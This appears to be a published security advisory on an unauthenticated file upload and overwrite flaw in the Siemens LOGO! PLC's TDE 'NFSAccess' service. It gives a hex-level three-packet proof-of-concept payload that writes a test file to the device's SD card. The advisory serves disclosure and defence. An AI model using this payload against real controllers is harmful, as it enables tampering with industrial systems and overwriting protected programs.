Siemens LOGO! TDE service "NFSAccess" Upload File Write Vulnerability

Summary

An exploitable file write vulnerability exists in the TDE service functionality of Siemens LOGO! 1.82.02, 12/24RCE Version 0BA and 230RCE Version 0BA. A specially crafted network request can upload or overwrite file content to the local SD card. An attacker can send a sequence of malicious packets to trigger this vulnerability.

Tested Versions

Siemens LOGO! 1.82.02
Siemens LOGO! 12/24RCE Version 0BA
Siemens LOGO! 230RCE Version 0BA

Product URLs

<https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html&gt;

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-306 - Missing Authentication for Critical Function

Details

Siemens LOGO! is an intelligent logic module (PLC) meant for automation projects such as industrial control systems, office/commercial and home settings. It is deployed worldwide and can be control remotely.

Files can be uploaded or overwritten on the SD card through the LOGO TDE Service port 135/TCP using the “NFSAccess” upload function. The security vulnerability could be exploited by an unauthenticated attacker with network access to port 135/tcp. No user interaction is required to exploit this security vulnerability. The vulnerability impacts integrity and availability of the device since a copy protected program can be overwritten during this process. The Payload used to upload a file (/dev/sdcard/webroot/js/ctalos.js) was:

Structure of payload message sent:

\x4B\x90\x05\xc0 # Start of message: Signature, Version, ClientVersion, Sync Flag, Return Flag, Request Flag.
\x02\x00\x00\x00 # Context
\x01\x00\x00\x00 # Session
\x4e\x46\x53\x41 # NFSAccess command
\x63\x63\x65\x73
\x73\x00\x00\x00
\x00\x00\x00\x00
\x02\x00\x00\x00 # Probably Open function
\xff\xff\xff\xff
\xff\xff\xff\xff # Probably File handle
\xff\xff\xff\xff
\x00\x00\xc0\x0c
\x21\x00\x00\x00 # Probably Data size
\x00\x00\x00\x00
\x2f\x64\x65\x76 # /dev/sdcard/webroot/js/ctalos.js # SD card path
\x2f\x73\x64\x63
\x61\x72\x64\x2f
\x77\x65\x62\x72
\x6f\x6f\x74\x2f
\x6a\x73\x2f\x63
\x74\x61\x6c\x6f
\x73\x2e\x6a\x73
\x00

\x4b\x90\x04\xc0 # Start of message: Signature, Version, ClientVersion, Sync Flag, Return Flag, Request Flag.
\x03\x00\x00\x00 # Context
\x01\x00\x00\x00 # Session
\x4e\x46\x53\x41 # NFSAccess command
\x63\x63\x65\x73
\x73\x00\x00\x00
\x00\x00\x00\x00
\x06\x00\x00\x00 # Probably Transfer function
\xff\xff\xff\xff
\x54\x15\x45\x55 # Probably File handle
\xff\xff\xff\xff
\x00\x00\x00\x00
\x11\x00\x00\x00 # Probably Data size
\x00\x00\x00\x00
\x2f\x2f\x20\x54 # Data to upload into SD card
\x68\x69\x73\x20
\x69\x73\x20\x61
\x20\x74\x65\x73
\x74

\x4b\x80\x03\xc0 # Start of message: Signature, Version, ClientVersion, Sync Flag, Return Flag, Request Flag.
\x04\x00\x00\x00 # Context
\x01\x00\x00\x00 # Session
\x4e\x46\x53\x41 # NFSAccess command
\x63\x63\x65\x73
\x73\x00\x00\x00
\x00\x00\x00\x00
\x03\x00\x00\x00 # Probably Closing function
\xff\xff\xff\xff
\x54\x15\x45\x55 # Probably file handle
\xff\xff\xff\xff
\x00\x00\x00\x00
\x00\x00\x00\x00
\x00\x00\x00\x00

We were able to identify this vulnerability on firmware 1.82.02 (released on May 13, 2019).

Timeline

2020-03-20 - Vendor Disclosure
2020-06-09 - Public Release